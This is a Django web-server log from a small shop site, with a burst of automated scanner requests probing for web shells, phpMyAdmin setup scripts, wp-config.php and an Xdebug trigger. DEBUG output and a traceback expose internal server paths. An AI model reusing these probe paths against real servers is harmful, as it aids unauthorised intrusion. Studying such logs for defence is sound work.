HTTP/1.0" 404 6567 Not Found: /.well-known/pki-validation/3DF2F5263C83846311E49CE286B2AB73.txt [01/Dec/2019 07:40:03] "GET /.well-known/pki-validation/3DF2F5263C83846311E49CE286B2AB73.txt HTTP/1.0" 404 6571 [01/Dec/2019 07:42:14] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:47:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 07:52:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:53:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 07:53:03,742 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cead9fhrsd9nwlsi2e06gtu95gx4mrig' LIMIT 1; args=('cead9fhrsd9nwlsi2e06gtu95gx4mrig',) DEBUG 2019-12-01 07:53:03,743 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cead9fhrsd9nwlsi2e06gtu95gx4mrig', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T07:53:03.742553+00:00'::timestamptz); args=('cead9fhrsd9nwlsi2e06gtu95gx4mrig', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 7, 53, 3, 742553, tzinfo=)) [01/Dec/2019 07:53:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 07:57:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:02:36] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:07:44] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:12:52] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:17:59] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:23:04] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:28:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:33:17] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:37:40] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:38:24] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:43:30] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:44:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:48:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:53:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 08:58:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:03:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:09:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:14:07] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:19:17] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:24:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:29:53] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:35:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:40:13] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:45:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:50:30] "GET / HTTP/1.0" 302 0 [01/Dec/2019 09:55:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:00:42] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:06:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:11:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 10:16:11] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:21:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:21:33] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:26:22] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:31:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:36:32] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:41:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:46:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:51:51] "GET / HTTP/1.0" 302 0 [01/Dec/2019 10:53:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 10:53:03,821 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6io3fxpa5g42lgdt6186aqw8oqy2953m' LIMIT 1; args=('6io3fxpa5g42lgdt6186aqw8oqy2953m',) DEBUG 2019-12-01 10:53:03,823 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6io3fxpa5g42lgdt6186aqw8oqy2953m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T10:53:03.821926+00:00'::timestamptz); args=('6io3fxpa5g42lgdt6186aqw8oqy2953m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 10, 53, 3, 821926, tzinfo=)) [01/Dec/2019 10:53:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 10:56:55] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:02:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:07:04] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:12:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:17:19] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:22:23] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:27:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:32:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:37:41] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:37:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:42:47] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:47:53] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:52:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 11:58:05] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:03:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:08:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:13:25] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:18:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:23:39] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:28:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:33:51] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:36:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:38:53] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:44:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:49:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:54:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 12:59:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:04:33] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:09:39] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:13:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:14:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:19:50] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:24:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:26:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 13:26:23,521 utils 26999 140702511523584 (0.008) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'iwglbxopi60jqrbyqccs5rio4cdu0knz' LIMIT 1; args=('iwglbxopi60jqrbyqccs5rio4cdu0knz',) DEBUG 2019-12-01 13:26:23,523 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('iwglbxopi60jqrbyqccs5rio4cdu0knz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T13:26:23.521664+00:00'::timestamptz); args=('iwglbxopi60jqrbyqccs5rio4cdu0knz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 13, 26, 23, 521664, tzinfo=)) [01/Dec/2019 13:26:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 13:27:28] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:30:02] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:31:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:35:08] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:40:14] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:45:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:50:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 13:53:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 13:53:03,813 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h16idplbx17wwxh1cpfb0i9afl5juzte' LIMIT 1; args=('h16idplbx17wwxh1cpfb0i9afl5juzte',) DEBUG 2019-12-01 13:53:03,814 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h16idplbx17wwxh1cpfb0i9afl5juzte', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T13:53:03.813614+00:00'::timestamptz); args=('h16idplbx17wwxh1cpfb0i9afl5juzte', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 13, 53, 3, 813614, tzinfo=)) [01/Dec/2019 13:53:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 13:55:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:00:35] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 14:05:46] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:10:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:15:59] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:21:05] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:26:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:31:16] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:36:23] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:41:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:46:33] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:51:36] "GET / HTTP/1.0" 302 0 [01/Dec/2019 14:56:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:01:52] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:06:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:11:51] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-01 15:11:52,047 utils 26999 140702511523584 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pewabgv9acsct83fyp659e7nvesya7og' LIMIT 1; args=('pewabgv9acsct83fyp659e7nvesya7og',) DEBUG 2019-12-01 15:11:52,050 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pewabgv9acsct83fyp659e7nvesya7og', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T15:11:52.047946+00:00'::timestamptz); args=('pewabgv9acsct83fyp659e7nvesya7og', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 15, 11, 52, 47946, tzinfo=)) [01/Dec/2019 15:11:52] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 15:12:04] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:17:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:22:09] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:22:16] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:27:19] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:32:28] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [01/Dec/2019 15:36:33] "GET /proxy.php HTTP/1.0" 404 6407 [01/Dec/2019 15:37:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:42:40] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:47:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 15:52:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 15:57:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:03:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:08:08] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:13:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:18:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:23:23] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:28:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:33:35] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:38:41] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:43:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:48:52] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:53:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 16:53:03,946 utils 26999 140702511523584 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e6d2brkjpvk72dbxmsm1ftg6id7n951a' LIMIT 1; args=('e6d2brkjpvk72dbxmsm1ftg6id7n951a',) DEBUG 2019-12-01 16:53:03,949 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e6d2brkjpvk72dbxmsm1ftg6id7n951a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T16:53:03.947475+00:00'::timestamptz); args=('e6d2brkjpvk72dbxmsm1ftg6id7n951a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 16, 53, 3, 947475, tzinfo=)) [01/Dec/2019 16:53:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 16:53:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 16:59:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 17:04:02] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:09:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:14:20] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:19:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:24:32] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:29:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:34:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:37:03] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-01 17:37:03,799 utils 26999 140702511523584 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qe5nwe4gv4jb8i9rqlqcrvzhij992oj8' LIMIT 1; args=('qe5nwe4gv4jb8i9rqlqcrvzhij992oj8',) DEBUG 2019-12-01 17:37:03,802 utils 26999 140702511523584 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qe5nwe4gv4jb8i9rqlqcrvzhij992oj8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T17:37:03.799693+00:00'::timestamptz); args=('qe5nwe4gv4jb8i9rqlqcrvzhij992oj8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 17, 37, 3, 799693, tzinfo=)) [01/Dec/2019 17:37:03] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [01/Dec/2019 17:39:46] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:44:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:49:59] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:55:04] "GET / HTTP/1.0" 302 0 [01/Dec/2019 17:59:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:00:07] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:04:20] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:05:15] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:10:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:15:25] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:20:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 18:22:52] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [01/Dec/2019 18:22:52] "GET /robots.txt HTTP/1.0" 404 6405 Not Found: /Adminb5512046/Login.php [01/Dec/2019 18:22:52] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6445 [01/Dec/2019 18:22:53] "GET / HTTP/1.0" 302 0 Not Found: /l.php [01/Dec/2019 18:22:53] "GET /l.php HTTP/1.0" 404 6390 Not Found: /phpinfo.php [01/Dec/2019 18:22:54] "GET /phpinfo.php HTTP/1.0" 404 6408 Not Found: /test.php [01/Dec/2019 18:22:54] "GET /test.php HTTP/1.0" 404 6399 Not Found: /index.php [01/Dec/2019 18:22:55] "POST /index.php HTTP/1.0" 404 6403 Not Found: /bbs.php [01/Dec/2019 18:22:55] "POST /bbs.php HTTP/1.0" 404 6397 Not Found: /forum.php [01/Dec/2019 18:22:55] "POST /forum.php HTTP/1.0" 404 6403 Not Found: /forums.php [01/Dec/2019 18:22:56] "POST /forums.php HTTP/1.0" 404 6406 Not Found: /bbs/index.php [01/Dec/2019 18:22:56] "POST /bbs/index.php HTTP/1.0" 404 6415 Not Found: /forums/index.php [01/Dec/2019 18:22:58] "POST /forums/index.php HTTP/1.0" 404 6424 DEBUG 2019-12-01 18:22:58,893 utils 26999 140702511523584 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) DEBUG 2019-12-01 18:22:58,952 utils 26999 140702511523584 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-12-01 18:22:58,954 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:22:58,956 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:22:58,957 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-12-01 18:22:58,959 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-12-01 18:22:58,960 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-12-01 18:22:58,962 utils 26999 140702511523584 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-12-01 18:22:58,964 utils 26999 140702511523584 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) Internal Server Error: /webdav/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [01/Dec/2019 18:22:59] "GET /webdav/ HTTP/1.0" 500 131198 Not Found: /help.php [01/Dec/2019 18:23:00] "GET /help.php HTTP/1.0" 404 6399 Not Found: /java.php [01/Dec/2019 18:23:01] "GET /java.php HTTP/1.0" 404 6399 Not Found: /_query.php [01/Dec/2019 18:23:02] "GET /_query.php HTTP/1.0" 404 6405 Not Found: /test.php [01/Dec/2019 18:23:02] "GET /test.php HTTP/1.0" 404 6399 Not Found: /db_cts.php [01/Dec/2019 18:23:02] "GET /db_cts.php HTTP/1.0" 404 6405 Not Found: /db_pma.php [01/Dec/2019 18:23:03] "GET /db_pma.php HTTP/1.0" 404 6405 Not Found: /logon.php [01/Dec/2019 18:23:03] "GET /logon.php HTTP/1.0" 404 6402 Not Found: /help-e.php [01/Dec/2019 18:23:04] "GET /help-e.php HTTP/1.0" 404 6405 Not Found: /license.php [01/Dec/2019 18:23:04] "GET /license.php HTTP/1.0" 404 6408 Not Found: /log.php [01/Dec/2019 18:23:04] "GET /log.php HTTP/1.0" 404 6396 Not Found: /hell.php [01/Dec/2019 18:23:05] "GET /hell.php HTTP/1.0" 404 6399 Not Found: /pmd_online.php [01/Dec/2019 18:23:06] "GET /pmd_online.php HTTP/1.0" 404 6417 Not Found: /x.php [01/Dec/2019 18:23:06] "GET /x.php HTTP/1.0" 404 6390 Not Found: /shell.php [01/Dec/2019 18:23:06] "GET /shell.php HTTP/1.0" 404 6402 Not Found: /htdocs.php [01/Dec/2019 18:23:07] "GET /htdocs.php HTTP/1.0" 404 6405 Not Found: /b.php [01/Dec/2019 18:23:07] "GET /b.php HTTP/1.0" 404 6390 Not Found: /sane.php [01/Dec/2019 18:23:08] "GET /sane.php HTTP/1.0" 404 6399 Not Found: /desktop.ini.php [01/Dec/2019 18:23:08] "GET /desktop.ini.php HTTP/1.0" 404 6420 Not Found: /z.php [01/Dec/2019 18:23:09] "GET /z.php HTTP/1.0" 404 6390 Not Found: /lala.php [01/Dec/2019 18:23:09] "GET /lala.php HTTP/1.0" 404 6399 Not Found: /lala-dpr.php [01/Dec/2019 18:23:10] "GET /lala-dpr.php HTTP/1.0" 404 6411 Not Found: /wpc.php [01/Dec/2019 18:23:10] "GET /wpc.php HTTP/1.0" 404 6396 Not Found: /wpo.php [01/Dec/2019 18:23:10] "GET /wpo.php HTTP/1.0" 404 6396 Not Found: /t6nv.php [01/Dec/2019 18:23:11] "GET /t6nv.php HTTP/1.0" 404 6399 Not Found: /muhstik.php [01/Dec/2019 18:23:11] "GET /muhstik.php HTTP/1.0" 404 6408 Not Found: /text.php [01/Dec/2019 18:23:12] "GET /text.php HTTP/1.0" 404 6399 Not Found: /wp-config.php [01/Dec/2019 18:23:12] "GET /wp-config.php HTTP/1.0" 404 6414 Not Found: /muhstik.php [01/Dec/2019 18:23:13] "GET /muhstik.php HTTP/1.0" 404 6408 Not Found: /muhstik2.php [01/Dec/2019 18:23:13] "GET /muhstik2.php HTTP/1.0" 404 6411 Not Found: /muhstiks.php [01/Dec/2019 18:23:14] "GET /muhstiks.php HTTP/1.0" 404 6411 Not Found: /muhstik-dpr.php [01/Dec/2019 18:23:14] "GET /muhstik-dpr.php HTTP/1.0" 404 6420 Not Found: /lol.php [01/Dec/2019 18:23:14] "GET /lol.php HTTP/1.0" 404 6396 Not Found: /uploader.php [01/Dec/2019 18:23:15] "GET /uploader.php HTTP/1.0" 404 6411 Not Found: /cmd.php [01/Dec/2019 18:23:15] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /cmv.php [01/Dec/2019 18:23:16] "GET /cmv.php HTTP/1.0" 404 6396 Not Found: /cmdd.php [01/Dec/2019 18:23:16] "GET /cmdd.php HTTP/1.0" 404 6399 Not Found: /knal.php [01/Dec/2019 18:23:16] "GET /knal.php HTTP/1.0" 404 6399 Not Found: /cmd.php [01/Dec/2019 18:23:17] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /shell.php [01/Dec/2019 18:23:18] "GET /shell.php HTTP/1.0" 404 6402 Not Found: /appserv.php [01/Dec/2019 18:23:18] "GET /appserv.php HTTP/1.0" 404 6408 Not Found: /scripts/setup.php [01/Dec/2019 18:23:18] "GET /scripts/setup.php HTTP/1.0" 404 6426 Not Found: /phpmyadmin/scripts/setup.php [01/Dec/2019 18:23:19] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /phpMyAdmin/scripts/setup.php [01/Dec/2019 18:23:19] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /phpmyadmin/scripts/db___.init.php [01/Dec/2019 18:23:21] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6474 Not Found: /phpMyAdmin/scripts/db___.init.php [01/Dec/2019 18:23:22] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6474 Not Found: /pma/scripts/setup.php [01/Dec/2019 18:23:22] "GET /pma/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /PMA/scripts/setup.php [01/Dec/2019 18:23:22] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /myadmin/scripts/setup.php [01/Dec/2019 18:23:23] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /MyAdmin/scripts/setup.php [01/Dec/2019 18:23:23] "GET /MyAdmin/scripts/setup.php 